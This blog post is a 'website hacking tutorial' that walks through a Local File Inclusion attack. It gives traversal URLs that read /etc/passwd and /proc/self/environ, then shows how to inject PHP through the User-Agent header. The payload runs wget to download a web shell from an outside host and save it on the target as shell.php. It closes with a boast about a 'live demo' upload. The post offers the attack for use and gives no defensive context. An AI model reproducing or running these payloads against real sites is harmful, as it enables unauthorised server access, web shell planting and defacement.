Hello Friends I (Chinmoy Pratim Borah) Am Here Again With A New Website Hacking TUTORIAL.
Name :- L.F.I (Local File Inclusion)
Difficulty Level :- Average.
Tutorial :-
LFI Attacks are occur in the web application when the parameters are not checked properly and checked before being used to include the files. By this vulnerability flow Attacker can see the arbitrary files on the directory and even can deface the site by uploading the Shell by this over flow.
So Now we will learn How To Hack a Website with LFI Method
Things you require :-
- LFI Vulnerable site
- User-Agent Switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ )
- A remote shell
So Lets Begin..
This is a Vulnerable link :- www.lamesite.com/index.php?id=page.php so we will check our LFI exploit code on this site. Then our vulnerable link will be like this :- www.lamesite.com/index.php?id=../../../../../../../../../../../../../../etc/passwd . Now will open the proc/etc/environ .
www.lamesite.com/index.php?id=./../../../../../../../../../../../../../proc/self/environ .
Now we will upload the shell in the Vulnerable site.
First of all download the User-Agent Switcher and Open it and click on new>New User-Agent
After opening the New User Agent ( You will get the screen like below screenshot ) Then in User Agent replace that with
” <?php phpinfo();?> ” without quotes and give the description whatever you like and click on Ok then refresh the {age you will get the PHP info file open in the Tab.
NOw again go to Agent users and replace the User Agent with <?exec(‘wget http://www.sh3ll.org/egy.txt -O shell.php’);?> and click ok.
( http://www.sh3ll.org/egy.txt you can put your remote shell link nad -O will convert the shell in shell.php )
Now we have successfully uploaded the shell in the site. You will get the shell link like this www.lamesite.com/shell.php .
Live Demo :~~~~~~
VUL LFI SITE :- www.lamesite.com
Uploaded File :- www.lamesite.com/shell.php (May removed also now.)
No comments:
Post a Comment